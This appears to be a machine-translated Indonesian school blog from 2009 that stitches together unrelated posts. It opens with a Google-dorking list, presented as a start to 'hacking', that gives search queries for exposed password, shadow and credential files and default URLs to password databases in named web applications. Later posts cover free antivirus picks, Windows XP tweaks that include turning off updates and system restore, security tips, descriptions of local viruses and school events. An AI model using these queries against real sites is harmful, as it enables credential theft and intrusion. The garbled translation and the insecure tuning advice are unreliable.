One set of error message query, can be found so that we can begin hacking on the next stage.

"A syntax error has occurred" filetype: ihtml
-> Informix database errors, potentially to function names, filenames, file structure information, pieces of SQL code and passwords

"Access denied for user" "Using password"
-> authorisation errors, potentially to retrieve user names, function names, file structure information and pieces of SQL code

"The script whose uid is" "is not allowed to access"
-> access-related PHP errors, potentially to take filenames, function names and file structure information

"Ora-00921: unexpected end of SQL command"
-> Oracle database errors, potentially to take filenames, function names and file structure information

"error found handling the request" cocoon filetype: xml
-> Cocoon errors, potentially to take the Cocoon version information, filenames, function names and file structure information

"Invision Power Board Database Error"
-> Invision Power Board bulletin board errors, potentially to function names, filenames, file structure information and piece of SQL code

"Warning: mysql _ query ()" "invalid query"
-> MySQL database errors, potentially to retrieve user names, function names, filenames and file structure information

"Error Message: Error loading required libraries."
-> CGI script errors, potentially to retrieve information about operating system and program versions, user names, filenames and file structure information

"# mysql dump" filetype: sql
-> MySQL database errors, potentially to the information database structure and contents

Google queries to find the location of passwords
outline of the location of a password system that can be accessed by google

"http:// *: * @ www"
site passwords for site, stored as the string

"http://username: password @ www ..." filetype: bak inurl: "htaccess | passwd | shadow | ht users"
file backups, potentially to take the user names and passwords

filetype: mdb inurl: "account | users | admin | administrators | passwd | password"
mdb files, potentially to retrieve password information

intitle: "Index of" pwd.db
pwd.db files, potentially to take the user names and encrypted passwords

inurl: admin inurl: backup intitle: index.of
directories whose names contain the words admin and backup

"Index of /" "Parent Directory" "WAS _ FTP.ini" filetype: this WAS FTP pwd _
WS_FTP configuration files, potentially to take the FTP server access passwords

ext: pwd inurlservice | authors | administrators | users) "#-FrontPage-"
There are Microsoft FrontPage passwords

filetypeql ( "passwd values ****" |" password values ****" | "pass values ****")
There is a SQL code and passwords stored in a database

intitle: index.of trillian.ini
configuration files for the Trillian IM

EGGDROP filetype: user
user configuration files for the EGGDROP ircbot

filetype: conf slapd.conf configuration files for OpenLDAP

inurl: "wvdial.conf" intext: "password" configuration files for WV Dial

ext: This eudora.ini configuration files for the Eudora mail client

filetype: mdb inurl: users.mdb
Microsoft Access files, potentially to retrieve user account information

intext: "powered by Web Wiz Journal"
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file - just enter http:///journal/journal.mdb instead of the default http:///journal/

"Powered by DUclassified"-site: duware.com
"Powered by DUcalendar"-site: duware.com
"Powered by DUdirectory"-site: duware.com
"Powered by DUclassmate"-site: duware.com
"Powered by DUdownload"-site: duware.com
"Powered by DUpaypal"-site: duware.com
"Powered by DUforum"-site: duware.com
intitle: dupics inurl: (add.asp | default.asp | view.asp | voting.asp)-siteuware.com
websites that use DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, by default allows us to retrieve passwords file
- To DUclassified, just enter http:///duClassified/ _private / duclassified.mdb
or http:///duClassified/

intext: "BiTBOARD v2.0" "BiTSHiFTERS Bulletin Board"
Bitboard2 use the website bulletin board, the default settings make it possible to retrieve passwords file to be obtained
- The way http:///forum/admin/data _ passwd.dat
or http:///forum/forum.php

Search for specific documents?
filetype: xls inurl: "email.xls" email.xls
files, potentially to take contact information

"phone * * *" "address *" "e-mail" intitle: "curriculum vitae"
CVs

"not for distribution"
confidential documents containing the confidential clause

buddylist.blt
AIM contacts list

intitle: index.of mystuff.xml
Trillian IM contacts list

filetype: Note "msn"
MSN contacts list

filetype: QDF
QDF database files for the Quicken financial application

intitle: index.of finances.xls
finances.xls files, potentially to take the information on bank accounts, financial Summaries and credit card numbers

intitle: "Index Of"-inurl: maillog maillog size maillog files, potentially to retrieve e-mail

"Network Vulnerability Assessment Report"
"Host Vulnerability Summary Report"
filetype: pdf "Assessment Report"
"This file was generated by Nessus"
reports for network security scans, penetration tests etc.. On the Net

to be more creative in trying to try their own, okeh

reference:

* Http://johnny.ihackstuff.com - largest repository of data on Google hacking,
* Http://insecure.org/nmap/ - Nmap network scanner,
* Http://thc.org/thc-amap/ - amap network scanner.

10 anti-virus free is good

10 anti-virus free is good

Anti-virus computer that is not good software should be paid, many are also a good free version. Even some anti-virus free are often considered to magazines as the computer is more powerful. Below are the 10 anti-virus that can be downloaded free of charge. Please click and attach to your computer. Do not forget, not just one, because the anti-virus more than one
at once can make your computer problems. If you want to change to other anti-virus, uninstall first anti-virus installed on your computer. When you are online, do not forget to update anti-virus, and usually in the auto-update.
1. AVG Anti Virus (free.grisoft.com/doc/download-free-anti-virus/us/frt/0)
2. Comodo Firewall (www.personalfirewall.comodo.com/)
3. Avast! 4 Home Edition (www.avast.com/eng/avast_4_home.html)
4. McAfee Site Advisor (www.siteadvisor.com/)
5. SpyCatcher Express (www.tenebril.com / consumer / spyware / spycatcher-express.php)
6. Starup Monitor (www.windowsstarup.com / starupmonitor.php)
7. Freeware Super Storm (www.thegreatpuzzle.com / superstorm.php)
8. Windows Defender (www.microsoft.com / athome / security / spyware / software / default.mspx)
9. Hijack This (www.trendsecure.com / portal / en-US / tools / security_tools / hijackthis)
10. Zone Alarm (www.zonealarm.com / store / content / catalog / products / sku_list_za.jsp)
Of 10 anti-virus, I recommend the number 1, 2, 3, and 10. Some of them have a paid version, but in general free version is very adequate. In addition to prevent the virus, almost all can also detect spyware and malicious programs are hidden in the computer. If you never use anti-virus free others, please share to the readers. Hopefully useful to protect our computers from malicious programs, as well as from the cyber thief.

Accelerating WINDOWS XP TIPS

Accelerating WINDOWS XP TIPS


1. Turn off the Indexing FACILITY SERVICES
This program is small, but take a big enough capacity ram. So that the PC
you are so overloaded and ultra busy. So? I saranin lo aje matiin cuy
Steps:
1. Open the Control Panel
2. Click the Add / Remove programs (I have ga tuker display the Control Panel so
Classic View)
3. Click the Add / Remove Win Components
4. Uncheck the Indexing services options
5. Next
6. Finish


2. Turn off the AUTO UPDATE
This automatic Updet have 2 losses, eating memory for large n so we lazier. better manual update ok? So just turn off this feature
Steps:
1. Open the Control Panel
2. Click the System (if you have not changed so the Control Panel Classic View)
3. Click the Automatic Updates tab
4. Select Turn Off Automatic Updates
5. OK


3. Optimize PAGEFILE
Pagefile is that HD capacity is reserved as an extension of RAM. So if low RAM capacity is greater than Lo. By default, XP pagefile determine capacity = 1.5 x RAM (if under 512 MB ram). Example: 256 MB RAM and pagefile should be 1.5 x 256 MB = 384 MB. If RAM = 1 GB pagefile should then 1x 1GB = 1 GB.
Now adjust the page file and the capacity of your ram so as above with the following
Steps:
1. Open Win Explorer
2. Right-click My Computer
3. Properties
4. Select the Advanced tab
5. At the Preformance select Settings
6. Select Advanced
7. Click the Change button in the Virtual Memory
8. Select the Drive containing the pagefile
9. Adjust the ram pagefile dangan the above data
10. SET
11. OK the finish
12. If you have a PC restart I restart


4. ISI WINDOW DELETE PREFETCH
Steps:
1. Open Win Explorer
2. Type C: \ WINDOWS \ Prefetch in the address bar
3. Sort Files based on Date Modified
4. Files that I spend 3 days was more
5. Restart Ur PC
5. Turn off system restore
Steps:
1. Open the Control Panel
2. Click the System (if there is no tuker display the Control Panel so Classic View)
3. Click the System Restore tab
4. Select Turn Off System Restore In All Drives
5. Apply
6. DLL
Yoi, I suggested the other, drives low defrag regularly, Clean Up as well, clean registry 1x week low, and boot defrag program low, reducing the capacity of the last Re Byn
? Defrag program and Boot
a. Click START
b. Select PROGRAMS
c. Select Accesories
d. Select Command Prompt
e. Command prompt on the screen to write defrag c:-b
f. Press ENTER
? Shrink Re Byn
a. Go Win Ex
b. Re Byn right click, properties
c. Select the tab GLOBAL
d. Select use one setting for all drives
e. Reduce 3% capacity so by using the slider
f. Apply

Six Step Computer Security

Six Step Computer Security

If you are concerned about security of your data and your computer, here are six easy steps that can help protect and preserve all that you've worked with great difficulty to your computer.

1. Use a firewall internet
If you do not use a firewall, the attacker can find and
attack your computer within 15 minutes after you connect to the Internet. If you access the Internet using the "always connected", such as cable modem or DSL, you must install a firewall and always update it.
There are 2 types of firewalls: hardware and software. Hardware-based firewall is usually a router or a personal computer that has been set to act sabagai firewall for all network in your home. Currently, however, many Internet firewall used in the home and small perangakat based software. Firewalls of this kind can be obtained from third parties, such as Zone Labs' ZoneAlarm. Or maybe the device was directly inserted in your operating system, such as ICF (Internet Connection Firewall) or Windows Firewall in Microsoft Windows XP, depending on the service pack that you have pairs.

2. Update your computer operating system
Once your firewall is installed, in order to keep the software your computer's most fundamental - the operating system - with continuously updated using software update Peng-you. Failure to do this will result in your computer in a very vulnerable situation because of negligence on the operating system and is usually known to be the target of the hacker and cracker. If you use the latest operating system, such as Windows XP, you can use Windows Update to manually download and install updates from Microsoft Windows Update site. To automatically download the updates at this time and will come, enable Automatic Updates feature by clicking Start
> Control Panel> Security Center.

3. Take advantage of your antivirus software as well as possible
Programs antivirus software to help protect your computer against most viruses, worms, Trojan horses, and other dangerous code. Many new computers have been equipped with antivirus software. However, antivirus software must be updated regularly, which usually require you to subscribe to the software the author. If you do not subscribe to update your antivirus software, then your computer will be vulnerable to new threats. Therefore, you should install anti-virus tool, use, and the guard to stay updated. Updates are usually available at least once a week.
After you install antivirus software, Arrange to undertake review of all existing data, data-entry of data and to download, email messages, and attachments. Enable schedule "check for updates" to check daily.

4. Prevent spyware, adware, and spam
Many sites and software for free that tout the username and
to report their activities to third parties who then use the information to send more spam. If you surf the internet, your computer will be entered spyware and adware. If you share data or send a short message, you will get spyware and adware than anymore. Best protection against spyware and adware is to not download it
from the start. To protect your computer not to download programs that harm:
  Download programs only from sites you trust
  Read all security warnings, license agreements, and privacy statements of each program that is downloaded.
  Do not have to click Agree or OK to close a window.
Instead, click the red X in the top right corner of the window or press Alt + F4
on your keyboard to close a window.
  Be careful in using the program to share music files and film "Cuma-cuma", and make sure that you fully understand all of the software into one package on these programs.
To minimize spam, consider the following options:
  Ask your Internet service provider to ensure that they run a type of spam filter and antivirus.
  Set up email filters in your email client (like Outlook Express, Eudora,
and others). Some spam filters mark the email is spam
with a marked *** SPAM *** subyeknya on the line. The other
X_SPAM put a sign or a title similar to the format of the message area.
You can set filters to find messages and
move in a separate place so that you can remove them when
only.
  Use a third-party products, such as Cloudmark Safety Bar, SpamAssassin and Bayesian Mail Filter, which automatically move spam that are recognized and put them in a separate place for you.

5. Select pop-up blocker trusted
You should install a pop-up blocker, such as Google toolbar or StopZilla, in your browser or use an alternative browser (Mozilla, Firefox, or Opera) that has a pop-up blocker inside. You should avoid a free program from the vendor that is not clear. Many free programs contain spyware in it. They advertise that they can do anything you want, but behind that, they contain a program that can harm your computer.
Tip: If you are running Windows XP with Service Pack 2, enable the Pop-up Blocker in Internet Explorer. You can do this by clicking Tools> Pop-up Blocker> Turn on Pop-up Blocker. The best way to stop the pop-up is to never allow them to install themselves on your computer since the beginning. You can do
avoid this with a site that does not clear, and never download and install programs from sources that are not trusted.

6. Protect your computer and your data is physically
The last thing is not less important, make sure that the computer and the data that is physically safe inside. Create a backup copy: To make backups easier and faster to perform, document and manage all of your data in the correct folder. Then you can easily copy all of the Zip drive, CD, or DVD, or use a backup program or service.
Keep your backup security: Keep your backup media outside the computer: for example with the menitipkannya friend or family, in a safety deposit box, or online using a trusted backup service.

Computer Virus 10 Most frightening

Computer Virus 10 Most frightening

VBScript type of virus attacks are still very high, this is evident from the many reports about the subject of this script type of virus. One virus that melesat high to first order is Discusx.vbs. If you still remember with this virus, in the Virus Top-10 March 2008 edition of the past, virus Discusx.vbs is in the order of 5, but this time he melesat up to first order. Read the list below:

1. Discusx.vbs
Virus VBScript this one, have a size around 4800 bytes. He will try in some menginfeksi drive in your computer, including flash disk drive, if that will make the infected autorun.inf file and System32.sys.vbs on the root drive is. In addition, it will change the caption of Internet Explorer to ".:: Discus-X SAY MET Lebaran! [HAPPY Lebaran ?!]::.".

2. Reva.vbs
Again, the type of virus VBScript the rather more dikeluhkan by some readers. He will try to spread itself to every drive on your computer, including flash disk drive. On the drive there are infected files akan reva.vbs, autorun.inf, and shaheedan.jpg. In addition, it will change the default page of Internet Explorer that leads to the site http://www.arrahmah.com.

3. XFly
PC Media Antivirus identify two variants of this virus, namely XFly.A and XFly.B. Just like most other local virus, it was created using Visual Basic. Has a body size of 143,360 bytes in no-compress. And it can masquerade as folders, files, MP3 WinAmp or the other way change the icon resource directly in the body. This will make it more user lay in it. At the infected computer, when running Internet Explorer, its caption changes to "..:: x-fly ::..", and start when Windows will appear the message from the creator of the virus in the default browser. Or at any time shows 12:30,
16:00, or 20:00, this virus will display a black screen also contains a message from the creator of the virus.

4. Explorea
Virus-in that uses Visual Basic compile this with the present size of approximately
167,936 bytes, with no in-compress. Using the icon looks like a standard Windows folder to trick victims. This virus will attack you with the Windows Registry to change the default open such as the extension of some. LNK,. PIF,. BAT, and. COM. At the infected computer, the time-specific error messages sometimes appear, for example, at the time to open the System Properties.

5. Gen.FFE
Gen.FFE or the author named Firus Fast Engine is one of the program Virus Generator locals. With only using this program, does not take long to be able to create a virus / new variants. Virus of the output of this program using the icon-like image standard default Windows folder. He also will block access to Task Manager, Command Prompt, and eliminate some of the menu in the Start Menu. He will also read the caption of the program is active, if there is a string associated with the antivirus program will soon be closed down by it.

6. Empty
Virus that is also created using Visual Basic and pro-a-folder icon has a body size of about 110,592 bytes, with no in-compress. Many of the changes he made on the Windows, such as the Registry, File System, and others, which can even cause Windows can not be used as appropriate. On the computer that is infected by the virus, starting when Windows will display a message from the creator of the virus.

7. Raider.vbs
This VBScript virus type size around 10,000 bytes, if the virus file was opened with Notepad, for example, the string is not much that can be read in the encrypted condition. In the Registry, it also provides the user with the create new key in HKLM \ Software with the same name as the name on the computer name, with its contents as a string value such as virus name, Raider, and the date the first time the computer is infected.

8. ForrisWaitme
Virus made with Visual Basic is similar to using the default folder icon
Windows penyamarannya to do. Some ulahnya switching function is the left mouse button with the right, remove the Folder Options menu, create the message file "read saya.txt" on the infected drive, and still have the other.

9. Pray
The virus is made using local Visual Basic. We found 2 variants of this virus, for variants Pray.A not have icon, while the variants Pray.B use Windows Explorer-like icon. If your computer is infected by this virus, at a time at the computer show at 05:15, 13:00, 16:00, 18:30, and 19:45, the virus displays a message reminding the user to perform prayers.

10. Rian.vbs
VBScript virus has the size of 3788 bytes. Menginfeksi time, it will create new files autorun.inf and RiaN.dll.vbs on each root drive installed in the computer of the victim, including the Flash Disk. Computers infected by the virus, the caption of Internet Explorer will change to "Rian P2 Highlights Cantiq hehehe ....... ^_^".

Tips Reduce Effect Radiasi Computers

Tips Reduce Effect Radiasi Computers

Here are some tips to reduce the effect of radiation machines.
1. Keep the distance with your eyes, at least 50 cm.
2. Set the monitor's position, so that the top of the monitor with your eyes.
3. Adjust lighting so that there is no reflection of light that blind.
4. berkediplah more often to keep the eyes in order not to dry (at least 5 minutes once).
5. Use a good filter monitor to reduce the radiation.
6. But menolehlah to the view that far to loosen tension on the eye.
7. Every 2 - 3 hours, Take about 5 minutes to prevent eye fatigue and also the radiation from the body (for example, a facial, go to the bathroom).

Selasa, 28 Juli 2009

SMANDA SUMMER 2009

its show on
hari yang dinanti2
oleh banyak orang
terutama OUTSIDERS Semarang
pensi ini terhitung paling rame
walupun di semarang da konser /rif dan the upstairs
smapai2 tiket smanda summer terjual habis atau sold out.
terimakasih bwt smuanya
mulai dari sponsor utama kita XL dan sponsor2 yg lain
dan tak lupa para penonton.
thx
see u in SMANDA SUMMER 2010
bye

Jumat, 10 Juli 2009

SMANDA SUMMER 2009

Allhamdullilah smanda summer 2009
Mndptkn guest star SUPERMAN IS DEAD
Jika ingin lihat?
Dteng ja d SMANDA SUMMER 2009
July 25th 2009
@ SMA 2 SEMARANG

Jumat, 01 Mei 2009

Study banding ke sma stella duce 1

hari ini kita pengurus osis sma 2 semarang.(Ardian(ketua osis), sigit(waka osis1), syarif(waka osis 2), erna(sekertaris), mayranni(bendahara), fitri(wa sekbid 2), dan saya sendiri. berangkat ke sma stella duce 1 jogja.

Rabu, 29 April 2009

Sponsor Pensi smanda summer 2009

bagi perusahaan anda yang ingin menjadi sponsor dalam acara pentas seni smanda(SMA 2 Semarang) summer 2009. bisa hubungi bintang (085726881771) atau email di admin.ossmanda@gmail.com terima kasih

Seleksi mas dan mbak SMA 2 Semarang tahap 1

mas dan mbak SMA 2 Semarang merupakan sudah tradisi dari jaman dulu. siswa SMA 2 Semarang sangat berpartisipasi terhadap acara yang satu ini. karena acara ini adalah ROAD TO SMANDA SUMMER 2009. SMANDA SUMMER 2009 adalah sebuah acara pentas seni SMA 2 Semarang yang dalam rangka menyambut anniversary SMA 2 Semarang yang ke 30. seleksi tahap 1 diselenggarakan kemaren tanggal 28 april 2009, yang berupa tes tertulis.

Selasa, 28 April 2009

introductions


Perkenalkan saya Bintang setya vidayanto anak ke 3 dari pasangan Drs Agus budhiyono dan Tri Hartanti BSc. Saya bersekolah di SMA 2 Semarang. Saya juga aktif di Organisasi sekolah (OSIS) dalam 2 periode. motivasi saya membuat blog ini adalah untuk memperkenalkan SMA 2 Semarang dan OSSMANDA (OSIS SMA 2 Semarang) kepada masyarakat luas melalui media internet ini. itu saja yang bisa saya sampaikan kurang lebihnya terima kasih.